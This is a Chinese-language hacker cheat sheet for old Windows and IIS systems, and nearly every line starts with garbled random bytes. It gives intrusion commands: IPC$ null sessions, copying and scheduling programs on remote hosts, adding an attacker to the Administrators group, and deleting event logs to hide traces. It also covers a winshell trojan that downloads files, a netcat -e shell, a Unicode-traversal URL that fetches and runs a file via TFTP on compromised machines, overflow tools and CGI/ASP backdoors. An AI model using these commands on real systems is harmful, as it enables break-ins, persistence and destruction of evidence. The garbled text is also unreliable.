网管和黑客都必须知道的命令
*B<I�>�<'G 常用的几条NET命令:
L0�V����R( =�l'_*B��8 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
e� ��CUcE( Z�W�W�8H�r (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
��$K5�s�)! ��9�qy�� 9 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
}o:�sx/=u_ c�H-��Z��j (查看远程主机时间) net time \\IP地址
n4&j<zAV{� �']Xx#U N (定时启动某个程序) at \\IP地址 02:18 readme.exe
(�g:W|�hS
sx^? Iw,N' (查看共享) net view \\IP地址
��;H�r@0f Oj�EA;;qq (查看netbios工作组列表) nbtstat -A IP地址
w&cyGd D5� uBkn����y; (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
xa0%;�nFKe T���Xl9c�6 (这两条把自己增加到管理员组): net user 用户名 密码 /add
WA\f�`SR�F �+i���!M[� net localgroup Administrators 用户名 /add
FE��mlC,�% gj;G�:�;1m (断开连接) net use \\IP地址\ipc$ /delete
uWj�-�tzu� �q�m5pEort 扫尾:
��j77}{5@p #�R~NR8(�z del C:\winnt\system32\logfiles\*.*
k$_]b0D{4� Df3v"iCq�} del C:\winnt\ssytem32\config\*.evt
F�� X2�`p_ �;l?(VqX_E del C:\winnt\system32\dtclog\*.*
�E��+M�dl* �b}*b�gx@< del C:\winnt\system32\*.log
�m8^��2�k2 H=RV ��M� del C:\winnt\system32\*.txt
L^���s;kkB [te7�uZv�- del C:\winnt\*.txt
\b��SHBTK� IE��f^.Z�� del C:\winnt\*.log
=I}V PxhE7 �h*Tiv^a�� 一、netsvc.exe
{/�!�Gh\i� vk��gL"([_ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
��g�|_*(=Q ?R�:�Hj=. netsvc /list \\IP地址
ve^MqW��&S '�oL[rO~j netsvc schedule \\IP地址 /query
�Li^!OHro. If��Cqez�d netsvc \\IP地址 schedule /start
�o�:�\���a L1 V�Tq9[3 二、OpenTelnet.exe
<�!�>}t a� �%�~2m$#�) 远程启动主机的Telnet服务,并绑定端口到7878,例如:
d`7] re��h 8��E��%*o� OpenTelnet \\IP地址 用户名 密码 1 7878
���Vp^s�ER n�7uD(��cL 然后就可以telnet到主机的7878端口,进入DOS方式下:
g(H3�arb&� vJUB;���hD telnet IP地址 7878
/n�:fxdhe� �#8OqX*�/� 三、winshell.exe
�4��O^1gw r�=�a�Q�S5 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
F[Sat;Sll� ���dtl<��� p Path (查看winshell主程序的路径信息)
,jcp"-5#j� c?",�k��zo b reBoot (重新启动机器)
}TvAjLIS6 �Q�LG,r^�
d shutDown (关闭机器)
�Q��j�U"|$ �}>U03aa�! s Shell (执行后你就会看到可爱的“C:\>”)
"iG��c'?/+ �� B4ze�$# x eXit (退出本次登录会话,此命令并不终止winshell的运行)
���n�#/�m7 our�5k��� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
3R��.c��j� f�BOG#-a}� 四、3389登陆器,GUI方式登录远程主机的
P'~3WL4MKs s�%|J�(0� 五、elsave.exe
`BD`p�a7.% 7S�Zs/wWh% 事件日志清除工具
jQ}|�]pj+ �sTyG�i�1� elsave -s \\IP地址 -l "application" -C
/^G�+vhlf\ ~�vF�o 0k( elsave -s \\IP地址 -l "system" -C
a�$8?�0`�( b] V�=wZ
o elsave -s \\IP地址 -l "security" -C
i(��HhL�&� ^O
��m]B;� 执行后成功清除应用程序日志,系统日志,安全日志
�ek!N� eu> E5Jk+6EcMa 六、hbulot.exe
8��:NHPHxB ?,C,q5
T�\ 开启win2kserver和winxp的3389服务
�:tG5~s�K Q.\ov�k~,a hbulot [/r]
�69�y�yVu_ s.�
[${S6O 使用/r表示安装完成后自动重起目标使设置生效。
"�O
"@HVF@ -',Y;��0b% 七、nc.exe(netcat.exe)
5GkM7Zu!{j kGP?Jx\PkH 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
6suc:r�p"; .`XA6e(8KR 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�$@;[K��\� IR�a*�}MJe 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
{*�9�i}w|2 ?]N&H90^�5 参数:
�Q�-5wI$�=
.Oh�$sma1 -e prog 程序重定向,一旦连接,就执行 [危险!!]
�t+ ]+�Gn� �,#l��oVLy -g gateway source-routing hop point[s], up to 8
qW�^�l2Jff �&ii
=$4"R -G num source-routing pointer: 4, 8, 12, ...
^pa).B.`T� _�Hk�`e�}} -h 帮助信息
jN0v<_PJED w2L)f�,X�� -i secs 延时的间隔
�$h9!"f[|j e>.x�Xg6Zn -l 监听模式,用于入站连接
5�H5Kt9DoW ]3�'d/v@fT -n 指定数字的IP地址,不能用hostname
M(f'qF�Y=K ps�{(UYM=b -o file 记录16进制的传输
q�c�F{Kex" r_m&J�l�@4 -p port 本地端口号
�3RUB�2c4 'P#I<�?�vB -r 任意指定本地及远程端口
jtwO\6��t& �',p�Ps�=� -s addr 本地源地址
Q23�y.^W%c N�fh(2g�K+ -u UDP模式
�iy9]Y5b � $@�F�j_
�N -v 详细输出——用两个-v可得到更详细的内容
�j;.&�+.�� ,e,{6Sg6gl -w secs timeout的时间
)�Be�;Zw.| R?Qou!*�]� -z 将输入输出关掉——用于扫描时
J�:a�^''�� 八、TFTPD32.EXE
T9A5L"-6T 9'�M_t�Mm5 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
I�� j� /�J =�g:\R$lQ� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
jg(�A_�V�� -�>(�B:�Cz 然后可以直接令文件运行:
zqkms�F�H{ X�QA2uR4�h http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
S��Em�D's� g�hl�9gFFj 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�\+\h�<D-5 K�0�]Wb=v� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
B�|&<���� ���pif��gt 一、一 Xscan命令行运行参数说明:
Fh'�Jb*�|Q �h!
<8=V( 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
q'q{M-U<�� 5�cU8�GgN` 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
��g2I�@j�3 .(-3L9�T} xscan -file <主机列表文件名> <检测项目> [其他选项]
S�y_M!`�B� 7�vF�q��O; 其中<检测项目> 含义如下:
sMx�\WTyz "`�k[���4C -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
Y��S*t�7� �]nh)FM��o -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
u��RIr,U�^ f�8lww)^,v -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�e+mD$(h
80�9-p_)B -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
���K�5$ �y �!FO�)||'[ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
sIpK@BQ�' �!ktr|9Bl� [其他选项] 含义如下:
~>�n<b1}�W =6$(�m}(74 -v: 显示详细扫描进度
bQ%^l#H_n' ��RUEU��n� -p: 跳过Ping不通的主机
"X��qj%\� ��
ulQE{c[ -o: 跳过没有检测到开放端口的主机
&V"&�SV>}� �n!�p&.Mt -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
